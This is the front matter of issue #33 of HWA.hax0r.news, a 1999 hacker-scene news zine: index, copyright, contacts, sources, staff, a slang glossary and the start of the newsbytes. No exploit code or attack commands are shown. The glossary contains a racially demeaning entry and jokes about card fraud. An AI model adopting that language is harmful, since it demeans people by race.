  [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
  [=HWA'99=]                         Number 33 Volume 1 1999 Sept 12th 99
==========================================================================
                    [ 61:20:6B:69:64:20:63:6F:75: ]
               [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
               [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

 _   ___        ___      _                 ___
| | | \ \      / / \    | |__   __ ___  __/ _ \ _ __ _ __   _____      _____
| |_| |\ \ /\ / / _ \   | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
|  _  | \ V  V / ___ \ _| | | | (_| |>  <| |_| | |  _| | | |  __/\ V  V /\__ \
|_| |_|  \_/\_/_/   \_(_)_| |_|\__,_/_/\_\\___/|_|(_)_| |_|\___| \_/\_/ |___/

  Well http://welcome.to/HWA.hax0r.news/ is back up and working!! I shoulda
  mentioned it in #32 but what can I say? I fucked up and left the message
  there from the week before, boy is my face red. ;^, - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

  The Hacker's Ethic

  Sadly, due to the traditional ignorance and sensationalizing of the mass
  media, the once-noble term hacker has become a pejorative.

  Among true computer people, being called a hacker is a compliment. One of
  the traits of the true hacker is a profoundly antibureaucratic and
  democratic spirit. That spirit is best exemplified by the Hacker's Ethic.

  This ethic was best formulated by Steven Levy in his 1984 book Hackers:
  Heroes of the Computer Revolution. Its tenets are as follows:

  1 - Access to computers should be unlimited and total.
  2 - All information should be free.
  3 - Mistrust authority - promote decentralization.
  4 - Hackers should be judged by their hacking not bogus criteria such as
      degrees, age, race, or position.
  5 - You create art and beauty on a computer.
  6 - Computers can change your life for the better.

  The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

  A Comment on FORMATTING:

  I received an email recently about the formatting of this newsletter,
  suggesting that it be formatted to 75 columns; in the past I've
  endeavoured to format all text to 80 cols except for articles and site
  statements and urls which are posted verbatim, I've decided to continue
  with this method unless more people complain, the zine is best viewed in
  1024x768 mode with UEDIT.... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

  New mirror sites

  http://www.sysbreakers.com/hwa
  http://www.attrition.org/hosted/hwa/
  http://www.ducktank.net/hwa/issues.html.
  http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
  http://hwazine.cjb.net/
  http://www.hackunlimited.com/files/secu/papers/hwa/
  http://www.attrition.org/~modify/texts/zines/HWA/
  * http://hwa.hax0r.news.8m.com/
  * http://www.fortunecity.com/skyscraper/feature/103/

  * Crappy free sites but they offer 20M & I need the space...

  HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
  and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
  and airportman for the Cubesoft bandwidth. Also shouts out to all our
  mirror sites! tnx guys.

  http://www.csoft.net/~hwa
  http://www.digitalgeeks.com/hwa

  HWA.hax0r.news Mirror Sites:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  http://www.attrition.org/hosted/hwa/
  http://www.attrition.org/~modify/texts/zines/HWA/
  http://www.ducktank.net/hwa/issues.html. ** NEW **
  http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
  http://www.csoft.net/~hwa/
  http://www.digitalgeeks.com/hwa. *DOWN*
  http://members.tripod.com/~hwa_2k
  http://welcome.to/HWA.hax0r.news/
  http://www.attrition.org/~modify/texts/zines/HWA/
  http://archives.projectgamma.com/zines/hwa/.
  http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

  SYNOPSIS (READ THIS)
  --------------------

  The purpose of this newsletter is to 'digest' current events of interest
  that affect the online underground and netizens in general. This includes
  coverage of general security issues, hacks, exploits, underground news
  and anything else I think is worthy of a look see. (remember i'm doing
  this for me, not you, the fact some people happen to get a kick/use
  out of it is of secondary importance).

  This list is NOT meant as a replacement for, nor to compete with, the
  likes of publications such as CuD or PHRACK or with news sites such as
  AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  BUGTRAQ or ISN nor could any other 'digest' of this type do so.

  It *is* intended however, to complement such material and provide a
  reference to those who follow the culture by keeping tabs on as many
  sources as possible and providing links to further info, its a labour
  of love and will be continued for as long as I feel like it, i'm not
  motivated by dollars or the illusion of fame, did you ever notice how
  the most famous/infamous hackers are the ones that get caught? there's
  a lot to be said for remaining just outside the circle...

  @HWA

=-----------------------------------------------------------------------=

                  Welcome to HWA.hax0r.news ... #33

=-----------------------------------------------------------------------=

  We could use some more people joining the channel, its usually pretty
  quiet, we don't bite (usually) so if you're hanging out on irc stop by
  and idle a while and say hi...

  *******************************************************************
  ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  ***                                                             ***
  *** please join to discuss or impart news on techno/phac scene  ***
  *** stuff or just to hang out ... someone is usually around 24/7***
  ***                                                             ***
  *** Note that the channel isn't there to entertain you its for  ***
  *** you to talk to us and impart news, if you're looking for fun***
  *** then do NOT join our channel try #weirdwigs or something... ***
  *** we're not #chatzone or #hack                                ***
  ***                                                             ***
  *******************************************************************

=-------------------------------------------------------------------------=

  Issue #33

=--------------------------------------------------------------------------=

  [ INDEX ]

=--------------------------------------------------------------------------=
  Key     Intros
=--------------------------------------------------------------------------=

  00.0 .. COPYRIGHTS ......................................................
  00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
  00.2 .. SOURCES .........................................................
  00.3 .. THIS IS WHO WE ARE ..............................................
  00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
  00.5 .. THE HWA_FAQ V1.0 ................................................

=--------------------------------------------------------------------------=
  Key     Content
=--------------------------------------------------------------------------=

  01.0 .. GREETS ..........................................................
  01.1 .. Last minute stuff, rumours, newsbytes ...........................
  01.2 .. Mailbag .........................................................
  02.0 .. From the Editor..................................................
  03.0 .. NSA Key Found in Windows ........................................
  04.0 .. Online Gambling is not Secure ...................................
  05.0 .. Zyklon Pleads Guilty ............................................
  06.0 .. Mitnick Transferred to Lompoc Federal Prison ....................
  07.0 .. C-Span Web Site Defaced .........................................
  08.0 .. killsentry.c a Port Sentry killer by Vortexia....................
  09.0 .. W. Richard Stevens dead at 48....................................
  10.0 .. New Palm Pilot RedBox for Canada is Released ....................
  11.0 .. Windows2000test Suffers Attack ..................................
  12.0 .. Flex-LM Security Breached .......................................
  13.0 .. Customers of Numerous ISPs Victims of Fraud .....................
  14.0 .. Air Force Asks to Preserve 'Panther Den' ........................
  15.0 .. $19.6 Million Awarded to Create DOD IDS .........................
  16.0 .. UK Plans Super Group to Crack Crypto ............................
  17.0 .. Nationwide Identity Database Plans Started in 1997 ..............
  18.0 .. Game Boy Advance to Connect to the Internet .....................
  19.0 .. South African Security Industry goes Loco over Portscan..........
  20.0 .. Owner of ZANet IRC Network runs into trouble.....................
  21.0 .. Global Hell Expose ..............................................
  22.0 .. "NSA" key in Microsoft CryptoAPI ................................
  23.0 .. 9999 - Hey! That's today! .......................................
  24.0 .. US Chinese Embassy Defaced ......................................
  25.0 .. Scottish Executive Site Defaced - After Warning .................
  26.0 .. Cholera Outbreak Expected .......................................
  27.0 .. Web Email Vulnerable? ...........................................
  28.0 .. Cyber Terrorism - US Biggest Threat .............................
  29.0 .. Philippine Gov Scared of Cyber Terrorists .......................
  30.0 .. US Sen. Warns of Cyber Attack Along with Y2K ,...................
  31.0 .. JPEG Steals ICQ Passwords .......................................
  32.0 .. BackDoor in Windows Found .......................................
  33.0 .. HERF Gun Demonstrated at InfowarCon .............................
  34.0 .. GNU Launches Free Encryption Tool ...............................
  35.0 .. Fringe Goes Offline .............................................
  36.0 .. IACSP Defaced ...................................................
  37.0 .. RUSSIAN HACKERS REPORTEDLY ACCESSED US MILITARY SECRETS..........
  38.0 .. NET PRIVACY STUDY INCLUDED IN RD BILL............................
  39.0 .. SCENE RELATIONS..................................................
  40.0 .. L0PHT HEAVY INDUSTRIES PROFILED..................................
  41.0 .. SUMMIT TALKS FOCUS ON E-COMMERCE SAFETY..........................
  42.0 .. SECURITY SOLUTIONS...............................................
  43.0 .. HTTP://WWW.KKK.COM HIJACKED......................................
  44.0 .. MS ORDERS SECURITY AUDIT AFTER HOTMAIL BREACH....................
  45.0 .. EMBASSY CRACKER MAY BE PLAYING GOVERNMENTS' GAME.................
  46.0 .. CYBER-CORPS TO PROTECT FEDERAL COMPUTERS.........................
  47.0 .. WINDOWS2000 BETA 3 BACKDOOR......................................
  48.0 .. AMERICAN EXPRESS AND E-COMMERCE..................................
  49.0 .. BUSINESS TOO TRUSTING OF E-MAIL..................................
  50.0 .. SCOTTISH HACKERS DECLARE WAR ON WALES............................
  51.0 .. V-ONE AND RED HAT IN SECURITY PACT...............................
  52.0 .. HACKERS DEFACE HACKER'S SITE.....................................
  53.0 .. How to penetrate Universities in less than an hour...............
  54.0 .. Biometrics, busting hackers by sense of smell...................
  55.0 .. HP Security Bulletin: Vulnerability in rpc.cmsd..................
  56.0 .. Microsoft Bulletin: "Fragmented IGMP Packet" Vulnerability.......
  57.0 .. Microsoft Bulletin: ActiveX Script Vulnerability.................
  58.0 .. Trend Micro: W97M_60thSKEPTIC virus..............................
  59.0 .. The story of MAX the AI (part 2, final episode)..................
  60.0 .. AOLwatch.........................................................

=--------------------------------------------------------------------------=

  AD.S .. Post your site ads or etc here, if you can offer something in
          return thats tres cool, if not we'll consider ur ad anyways so
          send it in. ads for other zines are ok too btw just mention us
          in yours, please remember to include links and an email contact.
          Corporate ads will be considered also and if your company wishes
          to donate to or participate in the upcoming Canc0n99 event send
          in your suggestions and ads now...n.b date and time may be
          pushed back join mailing list for up to date information.........
          Current dates: POSTPONED til further notice, place: TBA.. .......

 Ha.Ha .. Humour and puzzles ............................................

          Hey You!........................................................
          =------=........................................................

          Send in humour for this section! I need a laugh and its hard to
          find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
   H.W .. Hacked Websites ...............................................
   A.0 .. APPENDICES......................................................
   A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

  @HWA'99

  00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
  THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
  RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
  IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
  (SEE FAQ).

  Important semi-legalese and license to redistribute:

  YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
  GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
  Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
  LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link
  is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
  ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE
  DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

  THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
  (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
  COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

  I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
  AND REDISTRIBUTE/MIRROR. - EoD

  Although this file and all future issues are now copyright, some of
  the content holds its own copyright and these are printed and
  respected. News is news so i'll print any and all news but will quote
  sources when the source is known, if its good enough for CNN its good
  enough for me. And i'm doing it for free on my own time so pfffft. :)

  No monies are made or sought through the distribution of this material.
  If you have a problem or concern email me and we'll discuss it.

  cruciphux@dok.org

  Cruciphux [C*:.]

  00.1 CONTACT INFORMATION AND MAIL DROP
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
  Canada / North America (hell even if you are inside ..) and wish to
  send printed matter like newspaper clippings a subscription to your
  cool foreign hacking zine or photos, small non-explosive packages
  or sensitive information etc etc well, now you can. (w00t) please
  no more inflatable sheep or plastic dog droppings, or fake vomit
  thanks.

  Send all goodies to:

      HWA NEWS
      P.O BOX 44118
      370 MAIN ST. NORTH
      BRAMPTON, ONTARIO
      CANADA
      L6V 4H5

  WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
  ~~~~~~~  are reading this from some interesting places, make my day and
           get a mention in the zine, send in a postcard, I realize that
           some places it is cost prohibitive but if you have the time and
           money be a cool dude / gal and send a poor guy a postcard
           preferably one that has some scenery from your place of
           residence for my collection, I collect stamps too so you kill
           two birds with one stone by being cool and mailing in a
           postcard, return address not necessary, just a "hey guys being
           cool in Bahrain, take it easy" will do ... ;-) thanx.

  Ideas for interesting 'stuff' to send in apart from news:

  - Photo copies of old system manual front pages (optionally signed by
    you) ;-)
  - Photos of yourself, your mom, sister, dog and or cat in a NON
    compromising position plz I don't want pr0n.
  - Picture postcards
  - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
    tapes with hack/security related archives, logs, irc logs etc on em.
  - audio or video cassettes of yourself/others etc of interesting phone
    fun or social engineering examples or transcripts thereof.
  Stuff you can email:

  - Prank phone calls in .ram or .mp* format
  - Fone tones and security announcements from PBX's etc
  - fun shit you sampled off yer scanner (relevant stuff only like #2600
    meeting activities)
  - reserved for one smiley face -> :-) <-
  - PHACV lists of files that you have or phac cd's you own (we have a
    burner, *g*)
  - burns of phac cds (email first to make sure we don't already have em)
  - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
    in .ram etc format or .mp*

  If you still can't think of anything you're probably not that
  interesting a person after all so don't worry about it

  Our current email:

  Submissions/zine gossip.....: hwa@press.usmc.net
  Private email to editor.....: cruciphux@dok.org
  Distribution/Website........: sas72@usa.net

  @HWA

  00.2 Sources ***
       ~~~~~~~~~~~

  Sources can be some, all, or none of the following (by no means complete
  nor listed in any degree of importance) Unless otherwise noted, like msgs
  from lists or news from other sites, articles and information is
  compiled and or sourced by Cruciphux no copyright claimed.

  News & I/O zine ................. http://www.antionline.com/
  Back Orifice/cDc..................http://www.cultdeadcow.com/
  News site (HNN) .....,............http://www.hackernews.com/
  Help Net Security.................http://net-security.org/
  News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
  NewsTrolls .(daily news ).........http://www.newstrolls.com/
  News + Exploit archive ...........http://www.rootshell.com/beta/news.html
  CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
  News site+........................http://www.zdnet.com/
  News site+Security................http://www.gammaforce.org/
  News site+Security................http://www.projectgamma.com/
  News site+Security................http://securityhole.8m.com/
  News site+Security related site...http://www.403-security.org/ *DOWN*
  News/Humour site+ ................http://www.innerpulse.com
  News/Techie news site.............http://www.slashdot.org

  +Various mailing lists and some newsgroups, such as ...
  +other sites available on the HNN affiliates page, please see
   http://www.hackernews.com/affiliates.html as they seem to be popping up
   rather frequently ...

  http://www.the-project.org/ .. IRC list/admin archives
  http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

  alt.hackers.malicious
  alt.hackers
  alt.2600
  BUGTRAQ
  ISN security mailing list
  ntbugtraq
  <+others>

  NEWS Agencies, News search engines etc:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  http://www.cnn.com/SEARCH/
  http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
  http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
  http://www.ottawacitizen.com/business/
  http://search.yahoo.com.sg/search/news_sg?p=hack
  http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
  http://www.zdnet.com/zdtv/cybercrime/
  http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

  NOTE: See appendices for details on other links.
  http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
  http://freespeech.org/eua/ Electronic Underground Affiliation
  http://ech0.cjb.net ech0 Security
  http://axon.jccc.net/hir/ Hackers Information Report
  http://net-security.org Net Security
  http://www.403-security.org Daily news and security related site

  Submissions/Hints/Tips/Etc
  ~~~~~~~~~~~~~~~~~~~~~~~~~~

  All submissions that are `published' are printed with the credits
  you provide, if no response is received by a week or two it is assumed
  that you don't care whether the article/email is to be used in an issue
  or not and may be used at my discretion.

  Looking for:

  Good news sites that are not already listed here OR on the HNN affiliates
  page at http://www.hackernews.com/affiliates.html

  Magazines (complete or just the articles) of breaking sekurity or hacker
  activity in your region, this includes telephone phraud and any other
  technological use, abuse hole or cool thingy. ;-) cut em out and send it
  to the drop box.

  - Ed

  Mailing List Subscription Info (Far from complete) Feb 1999
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

  ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

  THE MOST READ:

  BUGTRAQ - Subscription info
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~

  What is Bugtraq?

  Bugtraq is a full-disclosure UNIX security mailing list, (see the info
  file) started by Scott Chasin. To subscribe to bugtraq, send mail to
  listserv@netspace.org containing the message body subscribe bugtraq.
  I've been archiving this list on the web since late 1993. It is
  searchable with glimpse and archived on-the-fly with hypermail.

  Searchable Hypermail Index;

  http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

  About the Bugtraq mailing list
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  The following comes from Bugtraq's info file:

  This list is for *detailed* discussion of UNIX security holes: what they
  are, how to exploit, and what to do to fix them.
  This list is not intended to be about cracking systems or exploiting
  their vulnerabilities. It is about defining, recognizing, and preventing
  use of security holes and risks.

  Please refrain from posting one-line messages or messages that do not
  contain any substance that can relate to this list`s charter. I will
  allow certain informational posts regarding updates to security tools,
  documents, etc. But I will not tolerate any unnecessary or nonessential
  "noise" on this list.

  Please follow the below guidelines on what kind of information should be
  posted to the Bugtraq list:

  + Information on Unix related security holes/backdoors (past and present)
  + Exploit programs, scripts or detailed processes about the above
  + Patches, workarounds, fixes
  + Announcements, advisories or warnings
  + Ideas, future plans or current works dealing with Unix security
  + Information material regarding vendor contacts and procedures
  + Individual experiences in dealing with above vendors or security
    organizations
  + Incident advisories or informational reporting

  Any non-essential replies should not be directed to the list but to the
  originator of the message. Please do not "CC" the bugtraq reflector
  address if the response does not meet the above criteria.

  Remember: YOYOW.

  You own your own words. This means that you are responsible for the
  words that you post on this list and that reproduction of those words
  without your permission in any medium outside the distribution of this
  list may be challenged by you, the author.

  For questions or comments, please mail me:
  chasin@crimelab.com (Scott Chasin)

  Crypto-Gram
  ~~~~~~~~~~~

  CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
  insights, and commentaries on cryptography and computer security.

  To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
  blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
  visit http://www.counterpane.com/unsubform.html.
  Back issues are available on http://www.counterpane.com.

  CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
  Counterpane Systems, the author of "Applied Cryptography," and an
  inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on
  the board of the International Association for Cryptologic Research,
  EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

  CUD Computer Underground Digest
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  This info directly from their latest ish:

  Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                        ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

  [ISN] Security list
  ~~~~~~~~~~~~~~~~~~~
  This is a low volume list with lots of informative articles, if I had my
  way i'd reproduce them ALL here, well almost all .... ;-) - Ed

  Subscribe: mail majordomo@repsec.com with "subscribe isn".

  @HWA

  00.3 THIS IS WHO WE ARE
       ~~~~~~~~~~~~~~~~~~

  Some HWA members and Legacy staff
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  cruciphux@dok.org.........: currently active/editorial
  darkshadez@ThePentagon.com: currently active/man in black
  fprophet@dok.org..........: currently active/IRC+ man in black
  sas72@usa.net ............. currently active/IRC+ distribution
  vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  dicentra...(email withheld): IRC+ grrl in black
  eentity ...( '' '' ): Currently active/IRC+ man in black

  Foreign Correspondents/affiliate members
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Qubik ............................: United Kingdom
  D----Y ...........................: USA/world media
  HWA members ......................: World Media

  Past Foreign Correspondents (currently inactive or presumed dead)
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  N0Portz ..........................: Australia
  system error .....................: Indonesia
  Wile (wile coyote) ...............: Japan/the East
  Ruffneck ........................: Netherlands/Holland

  Please send in your sites for inclusion here if you haven't already
  also if you want your emails listed send me a note ... - Ed

  Spikeman's site is down as of this writing, if it comes back online it
  will be posted here.

  http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

  *******************************************************************
  ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  *******************************************************************

  :-p

  1. We do NOT work for the government in any shape or form. Unless you
     count paying taxes ... in which case we work for the gov't in a BIG
     WAY. :-/

  2. MOSTLY Unchanged since issue #1, although issues are a digest of
     recent news events its a good idea to check out issue #1 at least and
     possibly also the Xmas issue for a good feel of what we're all about
     otherwise enjoy - Ed ...

  @HWA

  00.4 Whats in a name? why HWA.hax0r.news??
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Well what does HWA stand for? never mind if you ever find out I may
  have to get those hax0rs from 'Hackers' or the Pretorians after you.
  In case you couldn't figure it out hax0r is "new skewl" and although
  it is laughed at, shunned, or even pigeonholed with those 'dumb
  leet (l33t?) dewds' this is the state of affairs. It ain't
  Steven Levy's HACKERS anymore. BTW to all you up and comers, i'd
  highly recommend you get that book. Its almost like buying a clue.
  Anyway..on with the show .. - Editorial staff

  @HWA

  00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Also released in issue #3. (revised) check that issue for the faq
  it won't be reprinted unless changed in a big way with the exception
  of the following excerpt from the FAQ, included to assist first time
  readers:

  Some of the stuff related to personal usage and use in this zine are
  listed below: Some are very useful, others attempt to deny any possible
  attempts at eschewing obfuscation by obscuring their actual definitions.

  @HWA   - see EoA ;-)

  !=     - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If written
           an =/= (equals sign with a slash thru it) also means !=, =< is
           Equal to or less than and => is equal to or greater than (etc,
           this aint fucking grade school, cripes, don't believe I just
           typed all that..)

  AAM    - Ask a minor (someone under age of adulthood, usually <16, <18
           or <21)

  AOL    - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses
           through, we're not talking Kung-Fu being none too good here,
           Buy-A-Kloo maybe at the least they could try leasing one??

  *CC    - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

  CCC    - Chaos Computer Club (Germany)

  *CON   - Conference, a place hackers crackers and hax0rs among others go
           to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
           gear, get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.

  *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
                 hacker speak he's the guy that breaks into systems and is
                 often (but by no means always) a "script kiddie" see pheer
             2 . An edible biscuit usually crappy tasting without a nice
                 dip, I like jalapeno pepper dip or chives sour cream and
                 onion, yum - Ed

  Ebonics - speaking like a rastafarian or hip dude of colour also wigger
            Vanilla Ice is a wigger, The Beastie Boys and rappers speak
            using ebonics, speaking in a dark tongue ... being ereet, see
            pheer

  EoC    - End of Commentary

  EoA    - End of Article or more commonly @HWA

  EoF    - End of file

  EoD    - End of diatribe (AOL'ers: look it up)

  FUD    - Coined by Unknown and made famous by HNN - "Fear uncertainty and
           doubt", usually in general media articles not high brow articles
           such as ours or other HNN affiliates ;)

  du0d   - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.

  *HACKER - Read Steven Levy's HACKERS for the true definition, then see
            HAX0R

  *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
               is difficult to define, I think it is best defined as pop
               culture's view on The Hacker ala movies such as well erhm
               "Hackers" and The Net etc... usually used by "real" hackers
               or crackers in a derogatory or slang humorous way, like
               'hax0r me some coffee?' or can you hax0r some bread on the
               way to the table please?'
           2 - A tool for cutting sheet metal.

  HHN    - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN ..
           and HNN as a proper noun means the hackernews site proper.
           k? k. ;&

  HNN    - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

  J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

  MFI/MOI- Missing on/from IRC

  NFC    - Depends on context: No Further Comment or No Fucking Comment

  NFR    - Network Flight Recorder (Do a websearch) see 0wn3d

  NFW    - No fuckin'way

  *0WN3D - You are cracked and owned by an elite entity see pheer

  *OFCS  - Oh for christ's sakes

  PHACV  - And variations of same
           Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups
           Virus, Warfare

           Alternates: H - hacking, hacktivist
                       C - Cracking
                       C - Cracking
                       V - Virus
                       W - Warfare
                       A - Anarchy (explosives etc, Jolly Roger's Cookbook
                           etc)
                       P - Phreaking, "telephone hacking" PHone fREAKs ...
                      CT - Cyber Terrorism

  *PHEER - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

  *RTFM  - Read the fucking manual - not always applicable since some
           manuals are pure shit but if the answer you seek is indeed in
           the manual then you should have RTFM you dumb ass.

  TBC    - To Be Continued also 2bc (usually followed by ellipses...) :^0

  TBA    - To Be Arranged/To Be Announced also 2ba

  TFS    - Tough fucking shit.

  *w00t  - 1 - Reserved for the uber ereet, noone can say this without
               severe repercussions from the underground masses. also
               "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
               shit stirrers)

  *wtf   - what the fuck, where the fuck, when the fuck etc ..

  *ZEN   - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

  @HWA

                            -=- :. .: -=-

  01.0 Greets!?!?! yeah greets! w0w huh. - Ed
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Thanks to all in the community for their support and interest but i'd
  like to see more reader input, help me out here, whats good, what sucks
  etc, not that I guarantee i'll take any notice mind you, but send in
  your thoughts anyway.
* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

++ STOCKS GOING HIGH
From Help Net Security http://www.net-security.org/
by BHZ, Saturday 11th September 1999 on 1:46 am CET
Red Hat (www.redhat.com) stock is going high into the sky. Frank Batten Jr., Red Hat's largest investor and the has seen his 15 million shares in the company rise from $1 billion to an enormous $1.84 billion (current stock price today is $122.81).

++ LINUX TODAY MAILING LIST
From Help Net Security http://www.net-security.org/
by BHZ, Friday 10th September 1999 on 3:25 am CET
